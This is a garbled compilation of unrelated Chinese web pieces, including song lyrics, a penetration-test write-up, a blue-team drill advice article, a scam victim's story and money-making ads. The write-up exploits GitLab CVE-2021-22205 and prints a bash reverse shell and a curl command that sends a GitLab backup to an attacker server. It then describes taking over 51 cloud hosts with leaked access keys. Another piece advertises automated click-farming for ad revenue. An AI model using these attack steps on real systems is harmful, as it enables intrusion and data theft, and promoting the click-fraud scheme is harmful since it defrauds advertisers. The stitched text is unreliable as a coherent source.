有2首，你自己看下为你付出很多演唱：陈卓这场雨下个不停估计是因为我因为我被你伤害了老天他替我哭了我们的爱情就这样莫名其妙的结束了在你没有一句话说出口的时候爱已经走到了尽头不知道是因为什么我真的恨你这场雨下个不停估计是因为我因为我被你伤害了老天他替我哭了我们的爱情就这样莫名其妙的结束了在你没有一句话说出口的时候爱已经走到了尽头不知道是因为什么我真的恨你歌曲: 散了 歌手: 甘洛凡 专辑: 《伤感2010》散了演唱:甘洛凡作词:甘洛凡作曲:梁城 陈辉权不想让你放手是我想得太多就算世界末日只想抱着你看着你就足够请不要转身走就算放弃世界还想挽回你爱 不是一瞬间冲动的是你 唤醒我的爱你说你放弃了我的手在颤抖当初的爱情路都是我们真心的付出你说你害怕了你说爱都看不见了我们的爱情就这样散了想念你的傻笑想念你的拥抱如果还有来世遇见你就好爱 不是一瞬间冲动的是你 唤醒我的爱你说你放弃了我的手在颤抖当初的爱情路都是我们真心的付出你说你害怕了你说爱都看不见了我们的爱情就这样散了你说爱上他了说我们真的结束了所有的甜蜜都不敢想了你说你放弃了你说爱都看不见了我们的爱情就这样散了所有的过去已慢慢散了来时好好的回不去了是出自歌曲《怎么了》。《怎么了》是周杰伦、袁咏琳合唱的一首歌曲，由方文山作词，周杰伦作曲，林迈可编曲，收录于周杰伦2014年12月26日发行的专辑《哎呦，不错哦》中。嘻哈曲风的RAP风格，是周杰伦最独特无法取代的曲风，而这首歌最特别的是男女对唱的分手歌 ，男女都互相赌气冷战，吵到要分手，但是在独自一人时却又不断地问自己怎么了？歌词你说蓝色是你最爱的颜色你说如果没有爱那又如何怎么了 你怎么了看过你曾经最灿烂的笑容看过你紧紧拥抱爱的面孔怎么了 你消失了是不是我错了 搞错了天灰了 雨下着 凝望着 你走了都回不去了?像从前快乐怎么能轻易说要结束怎么会让你抱着我哭太努力的我们最后用力给祝福怎么看你笑着 我却心如刀割原来我们都一样顽固怎么会谁都绝口不提要幸福再也不能牵着你走未来每一步我们怀念什么 失去爱那一刻 才晓得你说蓝色是你最爱的颜色你说如果没有爱那又如何怎么了 你怎么了看过你曾经最灿烂的笑容看过你紧紧拥抱爱的面孔怎么了 你消失了是不是我错了 搞错了越爱着 越痛着 苦笑着 你走了我们约好了 要比我快乐怎么能轻易说要结束怎么会让你抱着我哭太努力的我们最后用力给祝福祝福我最爱的 遇见更爱你的 飞翔着我不想说 你不会懂 请别可怜我受伤的我 究竟需要 一个人 多少年 去度过我不想说 你不会懂 请别可怜我谁说我 一定要 永远笑着我不想怎么能轻易说要结束怎么会让你抱着我哭太努力的我们最后用力给祝福祝福我最爱的 能永远飞翔着原来我们都一样顽固怎么会谁都绝口不提要幸福再也不能牵着你走未来每一步我们怀念什么 失去爱那一刻 才晓得...

0x00 前言 本次分享主要是分享一次HC中的思路，值得大家学习，服务器已经交给相关部门进行取证等也已经打包结A了 0x01 信息收集 首先给到一个资产是二维码，是一张sese图片里面带有约炮的app下载，扫码后得到如下结果 得到如下结果：https://www.target.com 后进行访问主站 注册成功后发现全是妹子(........)，这个时候先别急，咱第一步先去看他调用的JS资源，随便点击一个资源然后刷新一下看他F12网络   这里首先我只能用当时留下的毫无关联的图片进行演示了，当时我看到的JS文件叫 "MyProfile"   </p> 0x02 JS断点调试 这个凭借个人感觉就是个关键信息(我的资料 - > 配置信息？)，   所以凭借这些理由，我在XHR中锁定了"MyProfile"这个关键字进行JS断点 然后刷新进行调试，在漫长的调试过程中我发现在一个很奇怪的JS文件中调用了我的MyProfile字段，叫 /assets/index-xxxxxx.js   一般来说我就会去审计一下这个JS文件，结果发现好东西了   bindgen: "git+http://123.123.123.123:1111/target2/a.git#0.0.14"   0x03 新突破 我当时就立刻去访问了一下，发现竟然是一个gitlab!   </p> 找了一下历史漏洞，CVE-2021-22205 直接梭哈，成功拿到shell   </p> 由于是执行命令，所以写了shell反弹       echo 'bash -i >& /dev/tcp/123.123.123.123/1111 0>&1' > /tmp/haha.shchmod +x /tmp/haha.sh/bin/bash /tmp/haha.sh 成功反弹shell   </p> 发现是ubunto的16.04，但是本地提权失败，找了SUID也没有办法，想尽了各种办法都没办法提权，打算放弃了。 所以接下来就是去寻找Git权限能做的操作，找了一个下午，最终找到了backups目录里下找到了一个backup的tar包，应该八成就是gitlab上的备份了。   </p>   Flask之取文件 但是问题来了，我怎么做到在我反弹shell中把文件拖出来了呢？scp等都试过了不行，于是乎我就写了个flask的上传页面让shell去curl一下把文件post上来（感觉这思路骚的）   </p> 我的服务器                                     from flask import Flask,requestimport os app = Flask(__name__) @app.route('/upload',methods=['POST'])def upload_file(): file = request.files.get('file') if file : filename = file.filename file.save(os.path.join(os.getcwd(),filename)) return f"File {filename} saved successfully" else: return "worry" if __name__ == '__main__': app.run(host='0.0.0.0',debug=True,port=5000) 受控主机shell   curl -X POST http://123.123.123.123:1111/upload -F file=@./a.gitlab_backup.tar   0x04 云沦陷(泄露AK SK) 几个G，下载漫长的很呢！然后拖到本地后应该就是gitlab的备份了，（因为他备份文件名字中带有gitlab的版本号）要用到对应的gitlab的相应版本去搭建。 然后本地搭建导入备份后慢慢的寻找一些有用信息，后面突然发现一个叫application.yaml的文件，进行审计后泄露了ak和sk（这开发倒是备份挺明白的，全部都写清清楚楚）。 这个时候行云管家一把梭哈，因为权限很大，接管整个云了，总共是51台主机都拿下了。   </p> 0x05 总结 思路就是 ：打点 -> JS文件断点调试 ->新突破上shell-> 解决困难-> 发现新大陆(本地搭建)-> 接管云，最后全部打包好给了JF，也进行取证立A了，到此因为一个JS文件拿下整个云结束了，思路可以学习一波。   </p>     文章来源：先知社区（1201463046740633）原文地址：https://xz.aliyun.com/t/12698  ...

  目前经鹏仔尝试，百度小程序虽然无法给网站带来快收录权限，但是还是可以带来 logo权限，以及保障标识，很多人说小程序没用，但是既然他存在，还是有存在的价值。 个人无法搞百度小程序，去淘宝随便100元办理一个本地的个体营业执照即可。   基于uniapp开发的多端zblog小程序，目前已兼容 百度、微信、QQ。 本次1.0.2版本升级如下： 1.对所有列表UI样式进行优化 2.新增分类菜单页、分类列表页； 3.针对微信小程序添加了分享功能； 4.由于文章数据过大，热门排行榜太消耗资源，所以本次将热门排行榜更换为最新文章接口； 5.对首页以及最新排行榜页面做了简单存储，二次打开时减少空白页面； 6.对小程序sitemap分页bug修改。 ...

一、攻防演练概述 自2016年开展首届HW行动以来，越来越多的企业、单位加入到HW行动中来，网络攻防演练越来越贴近实际情况，越来越考验其实际安全能力。HW行动对于我国网络安全行业发展有着巨大的促进作用。假若没有HW行动，大多数企业的安全防护体系建设还停留在预算审批阶段，在没有出现大的安全事件和触碰合规红线之前，企业对于安全方面的投入极为克制。HW失败，一年白干，这虽然是业界的一个段子，但是某些时候还是很有道理的。对于所有网络安全人员来说，这是一次年度大考，攻防演练的成败直接决定了他们本年度的绩效。对于提供驻场服务的安全厂商来说同样十分关键，第二年的攻防演练订单能不能续上就看今年驻场人员的表现。 由于HW行动的所有参与单位，最终根据其所获得的分数进行排名，随意排名靠后的单位就会非常被动。虽然不会面临直接处罚，但是会直接影响其评优等多项工作，重要性毋庸置疑。例如2022年，业界疯传某个金融单位因为在网络攻防演练中表现过于糟糕（系统被打穿），直接导致该单位二把手被撤职，下边安全人员和厂商驻场人员都讨不了好。 在攻防演练中，攻守双方分别是红队和蓝队，红队大多数都是由“国家队”、厂商渗透技术人员组成，其中“国家队”的占比大概是60%左右，负责对目标单位发起实战式网络攻击，以此检验其防护体系的实际安全能力。而蓝队基本基本是由企业/单位安全人员、厂商驻场安全服务人员组成，他们不仅要对抗红队持续发起的各种网络攻击，还要在溯源中固定证据，反制红队人员。 二、给蓝队防守方的11个忠告 1、运气第一，实力第二（手动狗头保命） 哪怕实力不强，运气好没被打破，轻轻松松取得令人羡慕的成绩；运气差，哪怕实力再强也有可能因为一个小错误而崩盘。有时候运气这种东西真的没办法吐槽，大家尽力就好。 2、攻防演练再怎么重视也不为过 攻防演练是检验安全体系建设有效性的关键指标之一，就像前文说的“这是一次安全人员的大考”，因此在攻防演练考试之前安全部门需充分向上管理，强调“攻防演练”的重要性，借此尽可能多申请资源，包括应急演练大屏、防守方专用电脑、部署监控视频等。 不论是驻场人员还是内部福利，有多少搞多少，这样才能更好滴提振士气；同时也要做好向下管理，提前给安全人员打好预防针，使得内部在行动指挥上形成统一。据说2023年HW行动刚刚开始，四川某运营商就已经被打穿，这一消息在网安圈内疯狂传播，不论是出于舆情考虑还是站在攻防演练的重要性上（ZZRW），该运营商的领导层都处于一个十分被动的位置，对于安全人员来说也是一个非常糟糕的消息。 3、神队友还是猪队友决定了攻防演练的成败 对于大多数公司/单位来说，蓝队防守方仅仅依靠公司内部安全人员是万万不行的（类似于电信行业大佬不在统计中），所以必须要找外援。说的再直白一点，攻防演练和篮球足球比赛差不多，在某些时候外援才是决定胜负的关键。如果遇上厉害的大佬，直接躺着就把分拿了。 至于怎么找到靠谱的白帽渗透人员，除了已有的资源外平时可以多参加一些相关会议，积累一些人脉。还有个不太文明的方法，如果有心仪的白帽可以将压力给到合作的厂商，利用他们的白帽资源来完成招募的目标。 不论是新队伍还是老队伍，面试环节都需要严肃对待，防止滥竽充数的混子影响战斗力，包括对人员进行技术能力、背景等方面的审核，确定防守方负责人并构建防守方组织架构，与第三方人员签署保密协 议，向防守人员宣贯防守规则及演练相关要求。 4、能不能写好技战法也是一大关键 一篇合格的技战法可以起到锦上添花的作用，让我们的成绩更加明显，也能让错误变的不那么明显，简单来说就是多得分，少掉分。自2016年开展HW行动以来，攻防演练双方的专业水平已经逐渐提升，防守方越来越多地通过设备联动、纵深防御、应急响应、溯源反制来抵挡攻击方专业的网络攻击。因此防守方技战法撰写的四大核心点分别是设备（体系）联动、纵深防御、应急响应、溯源反制。这四大核心点又可以进一步拆分成多个小点，围绕其中某一个点写深写透，凸显我方在攻防演练中的努力与成绩。 5、资产盘点是攻防演练前的准备 大多教情况下，蓝队对于自己的资产情况把控不够，导致部分资产未能纳入有效监测、防护范围，这就成为了防护体系中的暴露面。红队在发起进攻前，会先收集这些薄弱点，并以此为跳板攻入企业关键系统。 资产是安全运营的基础支撑能力，合格的安全管理是建立在对于资产全面且精准掌握的基础之上，动态、周期性的资产监测以及及时的变更预警是非常必要的，保持对于资产部署分析、业务属性及应用上下游关系等清晰的认知，才能够将企业在互联网的暴漏面进行持续收敛。 公网资产评估:通过收集企业暴露在公网的资产信息和敏感信息，分析存在的未知公网资产、以及业务系统源码、账号密码暴露等安全风险，协助企业在攻击者发起信息收集前收敛外部攻击面，提升企业对自身资产的掌握程度以及应对突发安全事件的能力。 内网资产评估:从内网安全维度对主机安全产品核心功能模块的检测结果进行详细分析，从而发现操作系统、业务系统存在的风险隐患为客户解读并持续跟进风险整改期间各类技术问题，协助企业提升操作系统、业务系统本身的健壮性，进而提高内网横向攻击门槛。 6、溯源与反制是防守方的得分神器 由于攻守双方天然处于不对等地位，因此在攻防演练中防守方如果能够通过主动式欺骗措施（例如高级蜜罐）来诱敌深入，收集信息并固定证据，最终对攻击方进行有效杀伤，将会获得非常多的加分。 溯源反制比较关键的是有效还原攻击链： 攻击者是通过“哪个系统”+“哪个漏洞”打进来的，确认攻击IP有哪些。 攻击者打到内网后做了什么操作，例如“流量代理”+“内网穿透”。 最后总结哪些互联网和内网系统被拿下了，并且通过安全流量设备等方式证明攻击者的攻击动作。 在溯源反制中，攻击源捕获是至关重要的步骤，在网络攻击发生时防守方需要通过各种方法获取攻击者的信息，比如说攻击者开始攻击的时间、攻击的手法、利用的漏洞、入口点是什么、有没有在服务器里留下后门、攻击者的IP地址是什么，被攻击的主机有哪些等。 7、布置好蜜罐 蜜罐是溯源与反制中最关键的技术。在攻防演练中，攻击者常利用的突破口多为对外开放的站点、服务上存在的漏洞、未经严格控制而开放的测试站点等。防守方应当提前分析自身网络特性，找到攻击者最可能“光顾”的区域，加强防护的同时，在相应区域内的关键信息节点部署蜜罐，使攻击者在信息收集阶段受到干扰，进而诱导攻击者对蜜罐发动攻击。 另外，目前不少蜜罐都能够监控和记录攻击者进入蜜罐后的所有动作进行，Web类的蜜罐还可识别和记录攻击者使用的攻击方法和攻击载荷，可作为判断攻击者意图的重要依据。防守方将由蜜罐收集的信息汇总至欺骗伪装平台，由平台进行统一分析，根据攻击者的攻击意图战略调整监控防御节点，做到因“敌“制宜。 最后还可以化被动为主动，充分使用主动诱捕战术。主动诱捕主要作用于演练活动启动前2-3天内，此时攻击方正广泛收集目标资产信息，防守方的目标是污染攻击方掌握的资产情报，并诱导攻击者优先访问伪装探针节点。 8、十二分防范钓鱼邮件 随着攻防演练变的越来越规范，除了使用0Day漏洞等大杀器外，攻击方其实很难对防守方的防护体系进行有效突破。这时候攻击方最常用的打点方式就是网络钓鱼攻击。 一般来说，一个制作精良的钓鱼邮件基本都有以下特征。首先是绕过防火墙等查杀手段，目前有多种免杀技术可供攻击方选择，例如使用分离加载的方法，通过C++编写的加载器，并使用MSF作为C2很容易制作一封免杀的钓鱼邮件。 其次，钓鱼邮件都有极强的针对性，里面包含了大量的社会工程学，是对目标用户发起针对性钓鱼，中招的概率并不低。2020年某集团企业副总就曾被钓鱼，直接导致攻防演练被打穿，该副总也因此被开除。因此，在攻防演练期间，企业所有员工必须高度重视钓鱼邮件，提高警惕性，不乱点击附件、网址等，一旦发现可疑邮件立即向安全部门报告。 最后，防守方成员也是攻击方钓鱼的重点目标。这几天各种0Day漏洞的消息满天飞，不少攻击队趁机利用这些漏洞进行钓鱼，大家切勿上当受骗。 9、安全意识培训很有必要 第8条提到钓鱼邮件，那么就不得不提及安全意识培训，尤其是在攻防演练期间很有必要对全员进行安全意识强化培训。以上文提及的钓鱼邮件为例，安全部门可列举常见的钓鱼邮件，深入分析其各项特征。这里分享一个方法，即在攻防演练之前预先发起一次钓鱼邮件攻击测试，对于中招的员工进行专门的培训，提高其安全意识。 钓鱼邮件只是其中之一，还有诸如弱口令、随意连WiFi、随意插U盘都会带来相应的安全问题，企业若能打出一套漂亮的安全意识提升组合拳，定可以大大减少因此带来的安全风险。因此在培训方面也要下一些功夫，这里建议安全部门可以联合行政、人事或市场人员共同参与，制作高质量的安全意识培训内容，而不是像上课一样照本宣科。在进行安全意识培训时可重点关注四大要素：游戏化、个性化、多样性和高质量内容，力争培训内容新颖有意思，千万不能为了培训而培训。 10、加大近源攻击防备力度 这两年近源攻击开始越来越流行，并且被认为是突破企业安全防线的有力突击技术。不同于通过有线网络进行安全性检测的传统方式，近源渗透测试是指测试人员靠近或位于测试目标建筑内部，利用各类无线通信技术、物理接口和智能设备进行渗透测试。近源渗透涉及到的测试对象非常多，包括WiFi、蓝牙、RFID、ZigBee、蜂窝、Ethernet等各类物联网通信技术，甚至包括智能设备的嵌入式安全。 分享部分近年来近源攻击中攻击队常用的工具，防守方可以有的放矢。 无线网卡：外接无线网卡主要是用来配合kali破解无线密码的，现在一般是通过抓握手包然后跑包来破解。还有其他的方式可以通过伪造SSID钓鱼等等。 WIFI 大菠萝：大菠萝不是吃的那个玩意，可以说是一个钓鱼WiFi。最新版本的大菠萝功能更强大，其实可以替代上面的外接无线网卡了。大菠萝可以捕获握手包并模仿目标AP，甚至可以完全模仿首选网络，从而实现中间人攻击。 EMP干扰器：当前电子设备和电路的工作频率不断提高，而工作电压却逐渐降低，因此对电磁脉冲（EMP）的敏感性和易损性也不断增加。同时，电子系统中的集成电路对电磁脉冲比较敏感，往往一个较大的电磁脉冲，就会使集成块产生误码、甚至电子元器件失效或烧毁等。 变色龙：变色龙主要有三种使用方法，第一种是随机化UID进行模糊测试、第二种是支持IC卡的仿真、第三种是存储多张虚拟化卡。 11、利用情报提升威胁感知能力 在攻防演练场景，威胁情报可以作用于防护的多个环节。威胁情报的作用多在于与所有防护产品融合带来的能力加成，它与检测阻断类产品如防火墙、IPS、WAF等联动可以提升检测准确率，与蜜罐类产品联动可有效助益对攻击者的溯源与反制，威胁情报的价值在于样本量及准确性，从更高维度的视角打通不同安全产品、不同防护阶段、不同防护位置信息交换的壁垒，掌握单点攻击全网可知的防守主动权。 如果企业缺乏相应的费用投入，那么在攻防演练期间也应掌握一些免费的威胁情报资源。斗象科技、微步在线等发力攻防演练的厂商，每年都会在攻防演练前发布一些列的漏洞合集，可供参考。例如斗象科技在7月底发布《2023攻防演练必修高危漏洞集合》，整合了近两年在攻防演练被红队利用最频繁且对企业危害较高的漏洞，包含了详细的漏洞基础信息、检测规则和修复方案，对于防守方来说有一定的参考价值。 三、总结 攻防的路径千千万万，于攻击方而言，一个路径上攻击失败，不代表整体攻击失败；一个路径上防守成功，也不代表整体防守成功。安全的木桶效应始终存在，只要有一条路径上的短板、脆弱点被攻击方利用，没能及时防守，可能就是全面的溃败。 1、大型机构/企业的总部的互联网边界越来越难攻陷。原因是通常总部边界的资产梳理清晰，暴露面控制得较好、高危漏洞修复及时，边界安全设备(VPN/SDP等）收缩办公业务，同时分析检测、蜜罐诱捕等能力建设齐全能快速发现攻击尝试 2、钓鱼(邮件、HR应聘等）成为重要手段，而且难以避免。安全中最脆弱的就是人，包括我们看到诈骗电话极难控制，就是因为人的脆弱性。多数情况下，钓鱼成功率，通常超过20%（100个邮件阅读者中，有20个人点击恶意附件）。在实际案例中，甚至能高达70% 3、通过泄漏/暴破账号登录业务系统，再分析登录后的业务系统漏洞，成功率高，成为惯用手段。受限于各业务系统的普遍性安全开发水平，多数业务的登录后业务接口，发现漏洞并不困难，文件上传、SQL注入等。 4、分子公司/供应商成为关键脆弱点，迂回攻击成功率大幅提升。分子公司、供应商的安全建设参差不齐，容易被发现脆弱点，从而迂回突破到总部。不少非总部单元，有n-day高危漏洞补丁没有打全，被攻击者轻易突破也是时有发生的事情。 5、0day/1day成为关键致胜手段。由于演练时间有限，所以积累、挖掘0day，并在演练期间通过0day/1day进行快速突破，成为关键致胜手段。 本文作者：爱吃炸鸡， 转载请注明来自FreeBuf.COM...

我跟骗子是咋认识的？wb上私信我聊天聊起来的，我本着多认识一个网友的想法，也没有往网恋的方向上去思考。 后这个骗子隔三差五的乱表白，乱“发情”。我回复的也很冷淡，我也想知道他到底想干嘛，断断续续的聊天。 骗子说他在广州做IT，公司是维护线上彩票啊，dubo网站的，说都是维护正规网站的。我也没多在意。 过几天骗子说公司派他去澳门出差，澳门duchang出现了问题要去维护。第二天晚上他就进入正题了，说发现一组数据是开奖号码，让我帮他下注赚钱。 我就帮他玩了几次，当时他账户里的钱从10w变成了28w，然后提现了，我也没有在意。只是觉得emmm真厉害呢……   </p>   </p> 第三天晚上，这位兄弟又让我帮他玩，我当时人在外面洗脚按摩，就没帮他玩。第四天白天的时候，帮他玩了下。 我对这个本身心有存疑，也偷偷注册了一个号，充值了1500，然后他说什么我也跟着下什么，第二把结束以后骗子可能察觉到了，换了高级厅（要10w+本金才能进的厅）。 我这个本金1500的小菜鸡就没法跟着玩了，然后我把偷偷注册的账号里的钱（共赢了两千多一共4k+）全提取出来了，两小时内到账。然后我就觉得，哇这个赚钱的诶！ 晚上骗子说让我也注册一个要带我理财，我再三推脱，我充了4k，然后骗子还不高兴了，说我没出息没志气？？？ 我本来不想充值，然后他说他会帮我一部分，我在想骗子的话也不至于用他的钱帮我吧……然后我就又充了1w，现在里面是1.4w 然后骗子给我充值了4w。   </p> 这个时候我还没有意识到这个是骗局，脑子里就在想怎么把剩下的4.6w搞定，然后开始第一次微粒贷的借贷…骗子这时候还在那边很笃定和我说不会骗我。   </p> 次日醒来，我从拍拍贷、分期乐借了3w出来（因为微粒贷电话我没接到没贷款成功）将3w充值进账号，骗子又帮我充值1.6w，网站本金达到10w了。（迄今我投进去4.4w） 然后下午骗子就带我开始运作了，他说买什么我就跟着买什么，中途骗子让我去问客服有什么活动。   </p> 骗子让我账户预约一个青铜会员，需要往里面充20w。我没有这么多钱，骗子安慰我说这个20w会帮我达成，我这边达成以后再帮他达成。这时候我心一落地说没问题…   </p>   </p> 玩了几把以后，我的账户金额从10w变成了48w，我也瞬间兴奋了！ 骗子和我说一起想办法解决这个20w。我重新点击微粒贷把微粒贷的3.4w借出来充值进去了，还差16.6w。这时候我已经放下戒心和骗子开始聊天了……   </p>   </p> 骗子之前一直不和我用微信聊天，一直用微博聊天，我还一直问，现在看来他给的解释很牵强，但是当时我竟然还相信了…   </p>   </p> 我还在那边做梦…和骗子在那边算账…我可真的是太愚蠢了……   </p>   </p>   </p> 他说次日他会帮忙给我的账户充值16.6w。次日下午的时候，他说他朋友那边暂时只有7w，先充值进去，还差9.6w。再晚一点他又找了2w充值进去，这样就还差7.6w。这时候骗子开始引诱我再次去借贷。   </p>   </p>   </p> 我还傻乎乎的和他说，我发现我的招商公积金贷能贷款15.2w……然后骗子可能激动了，让我借钱出来，而且开始激将法了。   </p> 然后招商贷钱到账以后我立马充值进去，然后很兴奋的进行提现动作，提现两次均失败。我问客服。骗子开始了下一步套路。   </p>   </p>   </p> 这个时候，我还没有反应过来这是骗局！！！还在那边担心，啊钱怎么还不回来…然后我把招商贷剩下的也贷出来了……   </p> 这个时候我投入进去已经23w了… 基本上都是贷款来的… 我也真的是很愚蠢！！！为什么这么大胆！！！！我傻乎乎的把7.2w都交了进去了…… 到了傍晚，骗子又开始他的套路，然后我再次去点击那些贷款。   </p>   </p> 我又从农商的公积金贷款贷了7w……把剩下的六万多解冻金交掉了…… 这个时候银行已经给我打电话了，问我是不是遭遇了电信诈骗。但是我还是没有起疑心，还傻乎乎的和他说了这个事情…   </p> 这个时候的我已经负债30w了… 客服说要等到次日才能解冻，这个时候我还在做着美梦，想着钱到账了我要怎么孝敬父母…   </p> 等到次日10点，我兴冲冲去提现，又提现失败骗子还在那边假意安慰我…这个时候又出来一个保卡费…还要8w多。   </p>   </p>    </p> 骗子又开始稳住我，说一起想办法。   </p>   </p> 我只剩最后的希望了，我把我最后的积蓄基金大概四万多取出来，让骗子再去借4w多，把这个保卡费交了。 我一直在和骗子保持联系，这个时候骗子的态度没有之前的好了，可能是知道利用价值快没有了… 然后骗子为了稳住我，说最后四万他来想办法。   </p>   </p>   </p>   </p>   </p> 这个时候警察叔叔也给我打电话了！！！但是我还是没有相信警察叔叔…我的天我实在太蠢了。   </p>   </p> 因为有一个基金我看错到账时间了要晚一两天才到账，但是这个保卡费要在8号交。正好8号我工资到账，我脑子也蠢，凑上工资刚好4.2w就又汇款了…   </p> 这个时候 这个骗子又开始套路了   </p>   </p>   </p>   </p>   </p> 这个时候，骗子已经开始态度转变，开始反咬一口了。   </p>   </p> 然后骗子开始了拖拉战术…   </p>    </p> 我当时真的很生气，然后我后来自己去京东白条和花呗套现，搞出了4w交进去。当时我自私的想法是钱拿出来我不给这个男的了。 事情发展越来越严重，我这个账户里的钱已经到了86w，下分的时候又失败。客服和我说让我提供几个朋友的卡号，分批下款，不然一下子八十多万下款账户会被冻结，然后我找了朋友的账户给客服了。 客服说我还要交四万多的给银行的“打点费”。我找朋友借了6w，又tm给客服转了。 这个时候我负债40+w了。 我兴冲冲的第二天问客服，客服又说这个下款被银行驳回，现在需要现金交接给我，公司派出三个代表来和我现金交接，我要交给他们6w出行费… 我找朋友东拼西凑又给他凑齐了…… 这时候负债46w+。 又过了24小时，客服和我说这几个人被扣在海关那边了，需要3w的关口费，我又去凑钱… 49w负债了… 又过了24小时，客服又和我说钱被海关扣了，需要我缴纳20%个人所得税，考虑到我特殊情况，公司帮我承担一半我自己交一半，也就是我交8w多。 我又找朋友借了6w，凑齐了八万多给客服。期待着第二天醒来现金到我手里。 到这个时候我负债55w+。   </p> 钱交完我总不安心，还在那边和骗子交流。   </p>   </p> 果然第二天又出现问题了……   </p>   </p> 骗子开始说我不认真“审题”了开始怪我了。   </p> 然后开始不耐烦的语气说话了，应该是知道我没有钱了……   </p>   </p> 因为一直想这个事情，交不出后续的八万多“税款”。我一直担惊受怕的，得了支气管炎咳嗽的不停，我妈看见我脸色不太对，一直问我发生了什么事情。 我实在忍不住和我妈说了，我妈想了很久和我说这是个骗局。 当下我立马崩溃了，哭了两天最后决定去报警了……冷静下来了这几天我真的觉得自己很蠢，看着之前的聊天记录我都觉得有很多的破绽但是我一直没在意。 报完警之后我一直意难平，微博上发了几段话骂骗子，骗子依然当没事人一样，诈骗犯真的没有心！不得好死！！！！真的！！！ 因为自己家里单亲，我从小性子比较内向，也迫切想要自己能够独立。所以我这次也因为我的性格狠狠地吃了大亏。 是我的贪心毁了我，之前我也信誓旦旦觉得我遇到杀猪盘不会被骗。本来想着做美梦…24岁的我年纪轻轻就能拥有几十万的积蓄… 前两天真的崩溃到想离开这个世界。 我所有的压力，都是因为我太想要。所有的痛苦，都是因为太较真了。有些事不能尽你心意，就是提醒你该转弯了。如果事事都如意，那就不叫生活了 ——原谅我现在才懂得这句话。 想了很久还是把我的被骗经历发上来，给大家做个警示。报了警，警察说找回钱的希望很渺茫，又气又恨，就是难找回。所以现在电信诈骗可以这么猖狂。接下来开始慢慢还债了，为自己的错误买单。 这是我的错我也不会逃避。我从没想过能从网上找到恋爱对象，我只是想赚钱证明我自己。父母觉得我就是月光族的命运，我也很不甘，我想赚钱证明自己。是我太过于贪财害了自己。 家里人也商量了会帮我解决这次的贷款。我心里也记着，我接下来也会努力赚钱慢慢还给他们的。是的，我还年轻，我能够努力赚钱。 来源：全民防骗局   </p> 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文   END   </p>     </p>    ...

一、项目介绍：影视项目是一钟可以免费看各大网站VIP的APP，推广链接被人打开5秒以上就能获得收益，用户点击一次就能获得0.045元，软件利用这一个优势，全自动挂机去刷这个访问量赚钱。 二、关于提现：提现都是隔天到账，还是比较靠谱的。每天都稳到 三，设备需求：一台普通的电脑即可。不需要多开配置 四、适合人群：类互联网项目的小伙伴。 五，教程含有市面上大部分影视链接并且长期更新。 六，Kirin博客网首发。  ...

每天都可以扫描领红包哦~需要点外卖的记得扫码！ 步骤如下： 1、打开微信扫码领饿了么/美团 外卖券->我老用户亲测中15元红包 2、配合店铺满减优惠->2块钱吃到了汉堡+鸡肉卷+小鸡腿+可乐 3、红包有效时间只有四个小时！不用掉就过期了！！ ...

这些暴利生意，你了解几个?长时间的沉浸在自己的赚钱圈子里，已经让我很长段时间没有认真去发现和关心过身边的其他人到底在做什么生意，靠什么门路赚钱。 前几年写公众号，很喜欢去剖析别人家的项目，什么玩法什么套路都爱琢磨一二。可能是写得太多了，现在看啥都不香了，没什么项目是能够让我听完瞬间热血沸腾的。还是三年前刚刚接触到CSGO游戏搬砖的时候有过这种感受。 01 其实我们身边到处都是赚钱的门路和点子，只是你不善于去发现。发现了也不愿意去做，做了也未必能坚持。就比如在华强北，一部二手手机，拿货90元，有人转手挂闲鱼上就卖150元，淘宝上卖价200元，还是同样的手机，在某某直播间里却被炒到350元。 同样在赛格电子楼里，一台搬砖主机批发价只要120元，而地下城的主播包技术指导，16台为一组，要价16800元，同学们，知道什么是割韭菜吗?如果割韭菜有段位上面的应该算是王者了吧。高耸云端的电子大厦里，排列着大大小小的档口，一台笔记本，一部手机，几件样品，却做着月流水200W以上的电商生意，而租金才一月2W。暴利程度无法想象。 当全国都在打击淘宝违禁内容刷信誉时，我却在成都看到一家违禁内容公司，专搞薅羊毛的生意，员工上百人，做得风生水起，有些生意就是在争议中悄悄崛起，而普通人又怎能理解呢? 02 我认识一个在日本开二奢公司的老板，每天靠帮会员拍卖二奢包包赚得盆满钵满。会员通过他们几百-1000元就能拍到自己想要的包包(7-9成新)，会员把这些包包拿回国内在朋友圈，小红书，某音某宝某闲鱼上挂卖，或者红布林、只二等二手奢侈品平台寄卖，平均售价在3000以上。这暴利程度你能想象吗?只要你不缺流量，这绝对是一桩稳赚不赔的生意。 不瞒大家说，这条暴利生意的链路童话花了好几个月时间已经全部摸清，当时差点就去报考了奢侈品鉴定师资格证的考试。奈何还是手头项目和学员太多，根本腾不出时间去让我干别的。心有余而力不足，只能忍痛放弃。 03 不难看出，当下能赚到钱的，无一例外是靠信息差，赚的就是你不知道的钱，赚的就是你不懂的钱，赚的就是你想赚钱的钱。 赚钱是很高端，很高难度的事吗?未必! 赚钱实际上对智力和认知要求很低，它不需要你有爱因斯坦般通天彻地的“认知”，不信，你看看目前某音上最捞钱的那些个大师，往往都是些厚脸皮、敢吹嘘、觉得老子天下第一实则内核狗屁不通的主，这就是最好的证明。而很多真正的天才艺术家科学家就因为精力配置点没放在商业上，终其一生都穷困潦倒。 可为什么这么多机会还是有很多人赚不到钱呢? 童话觉得，无外乎这么几个原因： 1、为了省钱而不愿意花钱，因为有些商机是要花钱才能接触或者嗅得到的。 2、不愿意走出去结交朋友，因为增长见识方式有很多种，有人通过免费的文字，视频，而有人通过请客与人交谈，朋友的财富就是我们的财富，这句话理解了，也就富了。 3、对任何事情，都处在一个表面的认知层面，刚刚学个皮毛马上又被其他更具诱惑力的东西吸引，导致对任何一件事情都没法领悟到核心要素，就像猴子掰玉米，感觉哪个都新鲜，最终都是竹篮打水一场空。 4、身处的圈子有限，导致自己的思想高度有限，也没有胆量去探索陌生领域，劳其一生，也就那样了。 走在大街上，随处可见蹲在垃圾桶边捡东西吃的年轻人，你别不信，越是大城市，这样的现象越多。有时候我真的很不理解，他们的脑袋里到底在想什么，为什么年纪轻轻就放弃了奋斗选择了躺平。 他们是真的智商有问题吗?是真的没有赚钱的能力吗?其实都不是，是脑子里缺少思想! 人的思想，就好比电脑里安装的软件一样，需要做什么事，就需要安装什么样的软件，一台新电脑，什么软件也没有，啥活也干不了，那跟台废电脑没两样。人也是如此，即使你再健康，你脑海里没思想，不知道自己要做什么，该怎么做，那也跟活死人没两样。 